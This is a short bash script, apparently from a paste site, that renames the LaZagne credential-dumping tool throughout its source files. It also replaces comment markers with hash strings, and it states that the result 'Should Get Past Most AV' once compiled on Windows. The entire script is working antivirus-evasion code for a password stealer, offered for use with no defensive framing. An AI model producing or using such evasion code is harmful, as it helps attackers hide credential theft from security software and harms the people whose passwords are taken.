EvadeMyLazagne.sh 1.5 KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455
  1. #!/bin/bash
  2. cat << "EOF"
  3. __ _ ___ ___ _ _ _ __ ___ ___ | |__ _ __ ___ __ _ ___| |__
  4. / _` / __/ __| | | | '_ ` _ \ / _ \_____| '_ \| '__/ _ \/ _` |/ __| '_ \
  5. | (_| \__ \__ \ |_| | | | | | | __/_____| |_) | | | __/ (_| | (__| | | |
  6. \__,_|___/___/\__,_|_| |_| |_|\___| |_.__/|_| \___|\__,_|\___|_| |_|
  7. **Evade My Lazagne**
  8. Use At Your Own Risk
  9. EOF
  10. unzip LaZagne-2.4.3.zip
  11. chmod -R 777 LaZagne-2.4.3
  12. echo "Enter A Random Word"
  13. read Random1
  14. echo "Enter Another Random Word"
  15. read Random2
  16. echo "Last One"
  17. read Random3
  18. cd LaZagne-2.4.3/Windows/
  19. find -type f -exec sed -i s/lazagne/$Random1/g {} +
  20. find -type f -exec sed -i s/LaZagne/$Random2/g {} +
  21. find -type f -exec sed -i s/laZagne/$Random3/g {} +
  22. mv lazagne/ $Random1
  23. mv LaZagne.py $Random2.py
  24. custom1=$(echo $custom1 | md5sum | head -c 20)
  25. custom2=$(echo $custom1 | md5sum | head -c 20)
  26. custom3=$(echo $custom1 | md5sum | head -c 20)
  27. custom4=$(echo $custom1 | md5sum | head -c 20)
  28. custom5=$(echo $custom1 | md5sum | head -c 20)
  29. find -type f -exec sed -i s/#comment1/#$custom1/g {} +
  30. find -type f -exec sed -i s/#comment2/#$custom2/g {} +
  31. find -type f -exec sed -i s/#comment3/#$custom3/g {} +
  32. find -type f -exec sed -i s/#comment4/#$custom4/g {} +
  33. find -type f -exec sed -i s/#comment5/#$custom5/g {} +
  34. echo "All Done! Your New Tool Should Get Past Most AV!"
  35. sleep 1
  36. echo "Compile Your Tool On A Windows Instance."